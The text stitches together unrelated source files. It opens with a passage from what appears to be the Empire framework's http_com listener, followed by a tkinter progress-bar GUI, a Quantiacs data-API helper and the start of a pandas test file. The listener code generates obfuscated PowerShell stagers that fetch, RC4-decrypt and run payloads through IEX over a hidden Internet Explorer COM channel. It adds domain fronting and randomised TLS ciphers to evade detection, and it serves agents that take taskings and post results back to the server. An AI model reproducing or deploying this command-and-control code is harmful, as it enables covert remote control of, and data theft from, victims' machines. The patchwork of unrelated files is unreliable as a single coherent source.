"K") + '.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
stager += "$ie=New-Object -COM InternetExplorer.Application;$ie.Silent=$True;$ie.visible=$False;$fl=14;"
stager += "$ser=" + helpers.obfuscate_call_home_address(host) + ";$t='" + stage0 + "';"
# add the RC4 packet to a header location
stager += "$c=\"%s: %s" % (requestHeader, b64RoutingPacket)
# Add custom headers if any
modifyHost = False
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
if headerKey.lower() == "host":
modifyHost = True
stager += "`r`n%s: %s" % (headerKey, headerValue)
stager += "\";"
# If host header defined, assume domain fronting is in use and add a call to the base URL first
# this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if modifyHost:
stager += helpers.randomize_capitalization(
"$ie.navigate2($ser,$fl,0,$Null,$Null);while($ie.busy){Start-Sleep -Milliseconds 100};")
stager += "$ie.navigate2($ser+$t,$fl,0,$Null,$c);"
stager += "while($ie.busy){Start-Sleep -Milliseconds 100};"
stager += "$ht = $ie.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $ie.document, $Null).InnerHtml;"
stager += "try {$data=[System.Convert]::FromBase64String($ht)} catch {$Null}"
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization(
"-join[Char[]](& $R $data ($IV+$" + helpers.generate_random_script_var_name("K") + ")) | IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
else:
print(helpers.color(
"[!] listeners/http_com generate_launcher(): invalid language specification: only 'powershell' is currently supported for this module."))
else:
print(helpers.color("[!] listeners/http_com generate_launcher(): invalid listener name specification!"))
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="",
language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http_com generate_stager(): no language specified!'))
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
stagingKey = listenerOptions['StagingKey']['Value']
host = listenerOptions['Host']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http_com.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
# Get the random function name generated at install and patch the stager with the proper function name
conn = self.get_db_connection()
self.lock.acquire()
stager = helpers.keyword_obfuscation(stager)
self.lock.release()
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
# Patch in custom Headers
headers = ""
if customHeaders != []:
crlf = False
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# Host header TLS SNI logic done within http_com.ps1
if crlf:
headers += "`r`n"
else:
crlf = True
headers += "%s: %s" % (headerKey, headerValue)
stager = stager.replace("$customHeaders = \"\";", "$customHeaders = \"" + headers + "\";")
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
# patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
randomizedStager = ''
stagingKey = stagingKey.encode('UTF-8')
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager,
obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey, randomizedStager.encode('UTF-8'))
else:
# otherwise just return the case-randomized stager
return randomizedStager
else:
print(helpers.color(
"[!] listeners/http_com generate_stager(): invalid language specification, only 'powershell' is current supported for this module."))
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http_com generate_agent(): no language specified!'))
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
b64DefaultResponse = base64.b64encode(self.default_response().encode('UTF-8'))
if language == 'powershell':
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
code = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
conn = self.get_db_connection()
self.lock.acquire()
code = helpers.keyword_obfuscation(code)
self.lock.release()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace(
'$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
"$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
# code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+b64DefaultResponse+'"')
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "' + str(b64DefaultResponse) + '"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
else:
print(helpers.color(
"[!] listeners/http_com generate_agent(): invalid language specification, only 'powershell' is currently supported for this module."))
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
if(-not $IE) {
$Script:IE=New-Object -COM InternetExplorer.Application;
$Script:IE.Silent = $True
$Script:IE.visible = $False
}
else {
$Script:IE = $IE
}
""" % (listenerOptions['Host']['Value'])
getTask = """
$script:GetTask = {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
$Headers = "%s: $RoutingCookie"
$script:Headers.GetEnumerator()| %%{ $Headers += "`r`n$($_.Name): $($_.Value)" }
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$ServerURI = $Script:ControlServers[$Script:ServerIndex] + $taskURI
$Script:IE.navigate2($ServerURI, 14, 0, $Null, $Headers)
while($Script:IE.busy -eq $true){Start-Sleep -Milliseconds 100}
$html = $Script:IE.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $Script:IE.document, $Null).InnerHtml
try {
[System.Convert]::FromBase64String($html)
}
catch {$Null}
}
}
catch {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
""" % (listenerOptions['RequestHeader']['Value'])
sendMessage = """
$script:SendMessage = {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
$bytes=$e.GetBytes([System.Convert]::ToBase64String($RoutingPacket));
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
$Headers = ""
$script:Headers.GetEnumerator()| %{ $Headers += "`r`n$($_.Name): $($_.Value)" }
$Headers.TrimStart("`r`n")
try {
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$ServerURI = $Script:ControlServers[$Script:ServerIndex] + $taskURI
$Script:IE.navigate2($ServerURI, 14, 0, $bytes, $Headers)
while($Script:IE.busy -eq $true){Start-Sleep -Milliseconds 100}
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
else:
print(helpers.color(
"[!] listeners/http_com generate_comms(): invalid language specification, only 'powershell' is currently supported for this module."))
else:
print(helpers.color('[!] listeners/http_com generate_comms(): no language specified!'))
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
app = Flask(__name__)
self.app = app
# Set HTTP/1.1 as in IIS 7.5 instead of /1.0
WSGIRequestHandler.protocol_version = "HTTP/1.1"
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
listenerName = self.options['Name']['Value']
message = "[!] {} on the blacklist/not on the whitelist requested resource".format(request.remote_addr)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.after_request
def change_header(response):
"Modify the headers response server."
headers = listenerOptions['Headers']['Value']
for key in headers.split("|"):
value = key.split(":")
response.headers[value[0]] = value[1]
return response
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.errorhandler(405)
def handle_405(e):
"""
Returns IIS 7.5 405 page for every Flask 405 error.
"""
return make_response(self.method_not_allowed_page(), 405)
@app.route('/')
@app.route('/iisstart.htm')
def serve_index():
"""
Return default server web page if user navigates to index.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return make_response(self.index_page(), 200)
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
if request_uri.lower() == 'welcome.png':
# Serves image loaded by index page.
#
# Thanks to making it case-insensitive it works the same way as in
# an actual IIS server
static_dir = self.mainMenu.installPath + "data/misc/"
return send_from_directory(static_dir, 'welcome.png')
clientIP = request.remote_addr
listenerName = self.options['Name']['Value']
message = "[*] GET request for {}/{} from {}".format(request.host, request_uri, clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
routingPacket = None
reqHeader = request.headers.get(listenerOptions['RequestHeader']['Value'])
if reqHeader and reqHeader != '':
try:
if reqHeader.startswith("b'"):
tmp = repr(reqHeader)[2:-1].replace("'", "").encode("UTF-8")
else:
tmp = reqHeader.encode("UTF-8")
routingPacket = base64.b64decode(tmp)
except Exception as e:
routingPacket = None
# pass
# if isinstance(results, str):
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions,
clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results == 'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
listenerName = self.options['Name']['Value']
message = "\n[*] Sending {} stager (stage 1) to {}".format(language, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
stage = self.generate_stager(language=language, listenerOptions=listenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(base64.b64encode(stage), 200)
elif results.startswith(b'ERROR:'):
listenerName = self.options['Name']['Value']
message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(
request_uri, clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
if 'not in cache' in results:
# signal the client to restage
print(helpers.color("[*] Orphaned agent from %s, signaling retaging" % (clientIP)))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 404)
else:
# actual taskings
listenerName = self.options['Name']['Value']
message = "[*] Agent from {} retrieved taskings".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(base64.b64encode(results), 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http_com')
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
else:
listenerName = self.options['Name']['Value']
message = "[!] {} requested by {} with no routing packet.".format(request_uri, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
try:
requestData = base64.b64decode(request.get_data())
except:
requestData = None
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if isinstance(results, str):
results = results.encode('UTF-8')
if results:
if results.startswith(b'STAGE2'):
# TODO: document the exact results structure returned
sessionID = results.split(b' ')[1].strip().decode('UTF-8')
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
listenerName = self.options['Name']['Value']
message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=listenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
encrypted_agent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(base64.b64encode(encrypted_agent), 200)
elif results[:10].lower().startswith(b'error') or results[:10].lower().startswith(b'exception'):
listenerName = self.options['Name']['Value']
message = "[!] Error returned for results by {} : {}".format(clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 200)
elif results == b'VALID':
listenerName = self.options['Name']['Value']
message = "[*] Valid results return by {}".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 200)
else:
return make_response(base64.b64encode(results), 200)
else:
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
# setting the cipher list allows for modification of the JA3 signature. Select a random cipher to change
# it every time the listener is launched
cipherlist = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384",
"ECDHE-RSA-AES256-SHA", "AES256-SHA256", "AES128-SHA256"]
selectciph = random.choice(cipherlist)
context.set_ciphers(selectciph)
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
listenerName = self.options['Name']['Value']
message = "[!] Listener startup on port {} failed: {}".format(port, e)
message += "\n[!] Ensure the folder specified in CertPath exists and contains your pem and private key file."
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
else:
print(helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])))
self.threads[self.options['Name']['Value']].kill()
|
progress.py
|
"""Small GUI for displaying resource discovery progress to the user."""
import collections
import threading
import tkinter as tk
import tkinter.messagebox
import tkinter.ttk
class LifetimeError(Exception):
"""Progress was interrupted (i.e., window closed or cancel button was pressed)."""
pass
class GuiProgressBar(tkinter.ttk.Frame):
def __init__(self, title, work_count, nowait, work_func, *func_args):
tkinter.ttk.Frame.__init__(self, relief='ridge', borderwidth=2)
self.work_count = work_count
self.worker_task = threading.Thread(target=work_func, args=func_args)
self.pending_stop = False
self.master.title(title)
self.master.protocol('WM_DELETE_WINDOW', self._confirm_quit)
self.pack(fill='both', expand=1)
self.widget_space = self._create_widgets()
if nowait:
self._start()
def _create_widgets(self):
# storage for widgets so we don't pollute GUI app instance namespace
widget_space = collections.namedtuple('WidgetSpace', [
'button_text',
'button',
'label_frame',
'label_text',
'label',
'progress_bar',
'status_label_text',
'status_label'
])
button_text = tk.StringVar(value='Start')
button = tkinter.ttk.Button(self, textvariable=button_text, command=self._start)
button.pack()
label_frame = tkinter.ttk.LabelFrame(self, text='Service:Region')
label_frame.pack(fill='x')
label_text = tk.StringVar()
label = tkinter.ttk.Label(label_frame, anchor='w', textvariable=label_text)
label.pack(fill='x')
#XXX: add small fraction to max so progress bar doesn't wrap when work finishes
progress_bar = tkinter.ttk.Progressbar(
self,
orient='horizontal',
length=self.master.winfo_screenwidth()/5,
mode='determinate',
maximum=self.work_count+1e-10
)
progress_bar.pack(fill='both')
status_label_text = tk.StringVar(value='0 / {}'.format(self.work_count))
status_label = tkinter.ttk.Label(self, anchor='w', textvariable=status_label_text)
status_label.pack(fill='x')
return widget_space(button_text,
button,
label_frame,
label_text,
label,
progress_bar,
status_label_text,
status_label)
def _confirm_quit(self):
if tkinter.messagebox.askyesno(message='Quit?'):
self.pending_stop = True
self.master.destroy()
def _confirm_cancel(self):
if tkinter.messagebox.askyesno(message='Cancel?'):
self.pending_stop = True
self.widget_space.button_text.set('Canceled')
self.widget_space.button.state(['disabled'])
def _start(self):
self.widget_space.button_text.set('Cancel')
self.widget_space.button['command'] = self._confirm_cancel
self.worker_task.start()
def update_progress(self, delta):
"""Update progress bar.
:param float delta: increment progress by some amount"""
if self.pending_stop:
raise LifetimeError('User initiated stop.')
self.widget_space.progress_bar.step(delta)
self.widget_space.status_label_text.set('{} / {}'.format(
int(self.widget_space.progress_bar['value']),
self.work_count
))
def update_svc_text(self, svc_name, region):
"""Update text in status area of GUI.
:param str svc_name: service name
:param str region: region name
"""
self.widget_space.label_text.set('{}:{}'.format(svc_name, region))
def finish_work(self):
"""Update GUI when work is complete."""
self.widget_space.button.state(['disabled'])
self.widget_space.button_text.set('Finished')
|
common.py
|
import typing as tp
import datetime
import os
import logging
from urllib.parse import urljoin
import urllib.error
import sys
import urllib.request
import time
import json
import math
import gzip
import xarray as xr
import numpy as np
import pandas as pd
import re
from qnt.log import log_info, log_err
import pickle, hashlib
import io
import progressbar
MAX_DATE_LIMIT: tp.Union[datetime.date, None] = None
MAX_DATETIME_LIMIT: tp.Union[datetime.datetime, None] = None
DEFAULT_TAIL = 6 * 365
class Fields:
OPEN = "open"
LOW = "low"
HIGH = "high"
CLOSE = "close"
VOL = "vol"
DIVS = "divs" # only for stocks
SPLIT = "split" # only for stocks
SPLIT_CUMPROD = "split_cumprod" # only for stocks
IS_LIQUID = "is_liquid" # only for stocks
OPEN_INTEREST = "oi" # only for futures
ROLL = "roll" # only for futures
f = Fields
class Dimensions:
TIME = 'time'
FIELD = 'field'
ASSET = 'asset'
ds = Dimensions
TIMEOUT = 60
RETRY_DELAY = 1
def get_env(key, def_val, silent=False):
if key in os.environ:
return os.environ[key]
else:
if not silent:
log_err("NOTICE: The environment variable " + key + " was not specified. The default value is '" + def_val + "'")
return def_val
ACCESS_KEY = get_env('API_KEY', '')
BASE_URL = get_env('DATA_BASE_URL', 'https://data-api.quantiacs.io/')
def request_with_retry(uri, data):
url = urljoin(BASE_URL, uri)
cached = cache_get(url, data)
if cached is not None:
return cached
retries = sys.maxsize if "SUBMISSION_ID" in os.environ else 5
for r in range(0, retries):
try:
req = urllib.request.Request(url, data, headers={'Accept-Encoding': 'gzip', "X-Api-Key": api_key})
with urllib.request.urlopen(req, timeout=TIMEOUT) as response:
length = response.getheader('content-length')
if length:
length = int(length)
blocksize = max(4096, length//100)
else:
blocksize = 4096
length = None
buf = io.BytesIO()
size = 0
sys.stdout.flush()
with progressbar.ProgressBar(max_value=length, poll_interval=1) as p:
while True:
buf1 = response.read(blocksize)
if not buf1:
break
buf.write(buf1)
size += len(buf1)
p.update(size)
sys.stderr.flush()
response_body = buf.getvalue()
if response.getheader('Content-Encoding') == 'gzip':
response_body = gzip.decompress(response_body)
cache_put(response_body, url, data)
return response_body
except KeyboardInterrupt:
raise
except:
logging.exception("download error: " + uri)
time.sleep(RETRY_DELAY)
raise Exception("can't download " + uri)
def parse_date(dt: tp.Union[None, str, datetime.datetime, datetime.date]) -> datetime.date:
if dt is None:
res = datetime.date.today()
else:
res = pd.Timestamp(dt).date()
if MAX_DATE_LIMIT is not None:
if res is not None:
res = min(MAX_DATE_LIMIT, res)
else:
res = MAX_DATE_LIMIT
return res
def parse_tail(tail: tp.Union[datetime.timedelta, int]):
return tail if type(tail) == datetime.timedelta else datetime.timedelta(days=tail)
def parse_date_and_hour(dt: tp.Union[None, str, datetime.datetime, datetime.date]) -> datetime.datetime:
if dt is None:
res = datetime.datetime.now()
else:
res = pd.Timestamp(dt).to_pydatetime()
if MAX_DATETIME_LIMIT is not None:
if res is not None:
res = min(MAX_DATETIME_LIMIT, res)
else:
res = MAX_DATETIME_LIMIT
return res
def datetime_to_hours_str(dt: datetime.datetime) -> str:
return dt.strftime("%Y-%m-%dT%H")
def parse_max_datetime_from_url(url):
r = re.compile("^.+/(\\d{4}-\\d{2}-\\d{2}T\\d{2})/{0,1}$")
m = r.match(url)
if m is not None:
return parse_date_and_hour(m.group(1))
r = re.compile("^.+/(\\d{4}-\\d{2}-\\d{2})/{0,1}$")
m = r.match(url)
if m is not None:
return parse_date_and_hour(m.group(1))
return None
def deprecated_wrap(origin):
import sys, traceback
stack = traceback.extract_stack(limit=2)
deprecated_name = stack[-2][3].split("=")[0].strip()
try:
f = sys._getframe(1)
deprecated_name = f.f_locals['__name__'] + '.' + deprecated_name
except:
pass
def wrap(*args, **kwargs):
log_err('WARNING: ' + deprecated_name + ' deprecated, use ' + origin.__module__ + '.' + origin.__name__)
return origin(*args, **kwargs)
return wrap
CACHE_RETENTION = datetime.timedelta(days=float(get_env('CACHE_RETENTION', '7')))
CACHE_DIR = get_env('CACHE_DIR', 'data-cache')
def cache_get(*args):
crop_cache()
p = pickle.dumps(args)
key = hashlib.sha1(p).hexdigest()
value_fn = os.path.join(CACHE_DIR, key + ".value.pickle.gz")
args_fn = os.path.join(CACHE_DIR, key + ".args.pickle.gz")
if os.path.exists(value_fn) and os.path.exists(args_fn):
try:
old_args = pickle.load(gzip.open(args_fn, 'rb'))
if old_args == args:
old_data = pickle.load(gzip.open(value_fn, 'rb'))
return old_data
except Exception as e:
log_err("Cache read problem:", e)
return None
def cache_put(value, *args):
if CACHE_RETENTION.total_seconds() == 0:
return
p = pickle.dumps(args)
key = hashlib.sha1(p).hexdigest()
value_fn = os.path.join(CACHE_DIR, key + ".value.pickle.gz")
args_fn = os.path.join(CACHE_DIR, key + ".args.pickle.gz")
pickle.dump(args, gzip.open(args_fn, 'wb', compresslevel=5))
pickle.dump(value, gzip.open(value_fn, 'wb', compresslevel=5))
def crop_cache():
global cache_min_mod_time
now = datetime.datetime.now()
if cache_min_mod_time is not None and datetime.datetime.now() - cache_min_mod_time < CACHE_RETENTION:
return
cache_min_mod_time = None
for fn in os.listdir(CACHE_DIR):
full_name = os.path.join(CACHE_DIR, fn)
if not os.path.isfile(full_name):
continue
m_time = os.path.getmtime(full_name)
m_time = datetime.datetime.fromtimestamp(m_time)
if now - m_time > CACHE_RETENTION:
os.remove(full_name)
else:
if cache_min_mod_time is None or cache_min_mod_time > m_time:
cache_min_mod_time = m_time
cache_min_mod_time = None
os.makedirs(CACHE_DIR, exist_ok=True)
if MAX_DATE_LIMIT is None:
MAX_DATETIME_LIMIT = parse_max_datetime_from_url(BASE_URL)
MAX_DATE_LIMIT = None if MAX_DATETIME_LIMIT is None else MAX_DATETIME_LIMIT.date()
api_key = os.environ.get("API_KEY", '').strip()
tracking_host = os.environ.get("TRACKING_HOST", "https://quantiacs.io")
if api_key != 'default':
if api_key == '':
log_err("Please, specify the API_KEY.")
log_err("See: https://quantiacs.io/documentation/en/user_guide/local_development.html")
sys.exit(1)
else:
url = tracking_host + "/auth/system/account/accountByKey?apiKey=" + api_key
try:
resp = urllib.request.urlopen(url)
except urllib.error.HTTPError as e:
if e.code == 404:
log_err("Wrong API_KEY.")
log_err("See: https://quantiacs.io/documentation/en/user_guide/local_development.html")
sys.exit(1)
sent_events = set()
def track_event(event):
if os.environ.get("SUBMISSION_ID", '') != '':
return
if event in sent_events:
return
sent_events.add(event)
import threading
url = tracking_host + '/engine/tracklib?apiKey=' + api_key + '&event=' + event
if 'STRATEGY_ID' in os.environ:
url = url + '&strategyId=' + os.environ.get('STRATEGY_ID', '')
t = threading.Thread(target=get_url_silent, args=(url,))
t.start()
def get_url_silent(url):
try:
urllib.request.urlopen(url)
except:
pass
if __name__ == '__main__':
log_info(parse_max_datetime_from_url('http://hl.datarelay:7070/last/2020-10-07T10/'))
log_info(parse_max_datetime_from_url('http://hl.datarelay:7070/last/2016-10-28/'))
# t = parse_max_datetime_from_url('http://hl.datarelay:7070/last/2020-10-07T10/')
# print(datetime.datetime.combine(t.date(), datetime.time.min))
# TODO Strange stuff, need to check usage
def from_xarray_3d_to_dict_of_pandas_df(xarray_data):
assets_names = xarray_data.coords[ds.ASSET].values
pandas_df_dict = {}
for asset_name in assets_names:
pandas_df_dict[asset_name] = xarray_data.loc[:, :, asset_name].to_pandas()
return pandas_df_dict
def from_dict_to_xarray_1d(weights):
weights_assets_list = [key for key in weights]
weights_values_list = [weights[key] for key in weights]
return xr.DataArray(weights_values_list, dims=[ds.ASSET], coords={ds.ASSET: weights_assets_list})
def filter_liquids_xarray_assets_dataarray(assets_xarray_dataarray):
liquid_xarray_assets_dataarray = assets_xarray_dataarray \
.where(assets_xarray_dataarray.loc[:, 'is_liquid', :] == 1) \
.dropna(ds.TIME, 'all').dropna(ds.ASSET, 'all')
return liquid_xarray_assets_dataarray
def check_weights_xarray_dataarray_for_nonliquids(xarray_weights_dataarray, xarray_assets_dataarray):
non_liquid_weights = xarray_weights_dataarray.where(xarray_assets_dataarray[0].loc['is_liquid', :] == 0)
non_liquid_weights = non_liquid_weights.where(non_liquid_weights != 0)
non_liquid_weights = non_liquid_weights.dropna(ds.ASSET)
if len(non_liquid_weights) > 0:
raise Exception(non_liquid_weights.coords[ds.ASSET].values)
def exclude_weights_xarray_dataarray_from_nonliquids(weights_xarray_dataarray, assets_xarray_dataarray):
liquid_weights_xarray_dataarray = weights_xarray_dataarray \
.where(assets_xarray_dataarray[0].loc['is_liquid', :] == 1) \
.dropna(ds.ASSET, 'all')
return liquid_weights_xarray_dataarray
# ///
|
test_html.py
|
from functools import partial
from importlib import reload
from io import BytesIO, StringIO
import os
import re
import threading
from urllib.error import URLError
import numpy as np
from numpy.random import rand
import pytest
from pandas.compat import is_platform_windows
from pandas.errors import ParserError
import pandas.util._test_decorators as td
